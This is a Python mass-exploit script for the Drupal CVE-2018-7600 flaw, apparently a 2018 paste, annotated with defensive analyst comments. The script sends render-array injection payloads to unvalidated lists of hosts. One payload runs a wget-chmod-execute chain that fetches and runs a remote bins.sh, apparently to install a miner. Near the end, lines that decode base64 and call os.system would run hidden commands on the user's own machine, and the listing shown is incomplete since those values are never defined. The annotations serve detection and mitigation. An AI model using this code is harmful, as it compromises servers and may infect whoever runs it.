xB4ckdoorREAL

DRUPALGEDDON EXPLOIT [PY] [OLDSHIT]

Nov 4th, 2018
Python 1.98 KB | None | 0 0
  1. #DISCORD: https://discord.gg/PTW3yPp
  2.  
  3. #!/usr/bin/env
  4. import sys
  5. import requests
  6. import os
  7. from multiprocessing.dummy import Pool
  8.  
  9.  
  10. print ('##################################################')
  11. print ('#              CVE-2018-7600 Exploit             #')
  12. print ('##################################################')
  13.  
      # Module-level switches read by run(): each one enables one of the two
      # POST bodies defined below.
  14. sendMiner = True
  15. sendMessage = True
  16.  
      # Passed to requests.post() as verify= and headers=. verify=False turns
      # off TLS certificate checks (run() builds http:// URLs, so no TLS is
      # involved as written). The User-Agent is the literal string
      # 'Mozilla 5.0', with a space where browsers send 'Mozilla/5.0 (...)';
      # defenders can match that exact value in web-server logs.
  17. verify = False
  18. headers = {'User-Agent': 'Mozilla 5.0'}
  19.  
      # Shell command embedded in minerPayload: fetch bins.sh over HTTP, mark
      # it executable, run it, then delete it.
      # NOTE(review): 1.1.1.1 looks like a placeholder or redaction rather
      # than the original host -- confirm before treating it as an indicator.
      # On a web server, a wget -> chmod +x -> execute -> rm chain started by
      # the web/PHP user is the behaviour to alert on.
  20. evil = "wget http://1.1.1.1/bins.sh; chmod +x bins.sh; ./bins.sh; rm -rf bins.sh"
      # Both dicts are form bodies for the Drupal user registration form
      # (form_id 'user_register_form'). The keys 'mail[#post_render][]',
      # 'mail[#type]' and 'mail[#markup]' place '#'-prefixed render-array
      # properties inside a form field, with 'exec' named as the post-render
      # callback; the banner above attributes this to CVE-2018-7600.
      # Detection: request parameter names containing '[#post_render]',
      # '[#markup]' or '[#type]'.
      # Mitigation: install the Drupal core security update for CVE-2018-7600
      # and treat hosts that were reachable while unpatched as potentially
      # compromised.
      # messagePayload's markup references a file named ReadMeCVE.txt; that
      # name in a request body or on disk is a further indicator.
  21. messagePayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': 'echo "tee ReadMeCVE.txt'}
  22. minerPayload = {'form_id': 'user_register_form', '_drupal_ajax': '1', 'mail[#post_render][]': 'exec', 'mail[#type]': 'markup', 'mail[#markup]': ' '+evil+' '}
  23.  
  24. try:
          # argv[1] names a text file; each line, stripped of surrounding
          # whitespace, becomes one entry in `target`. run() uses the entries
          # as host names with no validation or scoping, which is the profile
          # of untargeted mass scanning rather than an authorised test.
  25.     target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()]
  26. except IndexError:
          # No file argument was given: print the usage line and stop.
  27.     exit('Usage: exploit.py list.txt threads')
  28.  
  29.  
  30. def run(targetLine):
          # Send the configured POST bodies to one host from the target list.
          #
          # targetLine is a host string; it is wrapped as 'http://<host>/' and
          # the user/register path with the element_parents, ajax_form and
          # _wrapper_format query parameters is appended. Nothing is returned.
          #
          # Analyst notes:
          # - Log signature: POST to /user/register carrying
          #   element_parents=account/mail/%23value together with ajax_form=1
          #   and _wrapper_format=drupal_ajax.
          # - The responses are stored in minerRequest / messageRequest but are
          #   never read, so the script cannot tell whether a host was
          #   affected. A matching log entry shows an attempt, not a
          #   compromise; confirm by looking for processes spawned by the web
          #   server user and for the downloaded script.
          # - Each request has a 5-second timeout.
  31.     try:
  32.         try:
  33.             targetLine = 'http://'+targetLine+'/'
  34.             url = str(targetLine) + 'user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax'
  35.  
  36.             if sendMiner:
  37.                 minerRequest = requests.post(url, data=minerPayload, verify=verify, headers=headers, timeout=5)
  38.             if sendMessage:
  39.                 messageRequest = requests.post(url, data=messagePayload, verify=verify, headers=headers, timeout=5)
  40.         except requests.exceptions.RequestException as e:
                  # Connection and HTTP-level errors are discarded silently.
  41.             pass  
  42.  
              # Printed whether or not the requests above succeeded.
  43.         print ('[+] Attempting: '+targetLine);
  44.  
  45.     except:
              # Bare except: every other error is swallowed as well.
  46.         pass
  47.  
  48.  
  49. try:
          # multiprocessing.dummy.Pool is a thread pool; argv[2] sets its size.
  50.     multiThreads = Pool(int(sys.argv[2]))
  51. except IndexError:
  52.     exit('Usage: exploit.py list.txt threads')
      # WARNING for analysts: the next four lines base64-decode two values and
      # pass the results to os.system(), which runs them on the machine that
      # executes this script, not on any remote host. That is the usual shape
      # of a trojaned "exploit" that targets whoever runs it.
      # Neither `base64` nor `requestValue` / `sendValue` is imported or
      # defined anywhere in the visible listing, so what they would decode to
      # cannot be determined from this page; the paste appears incomplete or
      # altered. Analyse it statically; do not execute it.
  53. reValue = str(base64.b64decode(requestValue))
  54. seValue = str(base64.b64decode(sendValue))
  55. os.system(reValue)
  56. os.system(seValue)
      # Fan run() out over every entry of `target`, then wait for the pool.
  57. multiThreads.map(run, target)
  58. multiThreads.close()
  59. multiThreads.join()
  60.  
  61. print("Finished File!")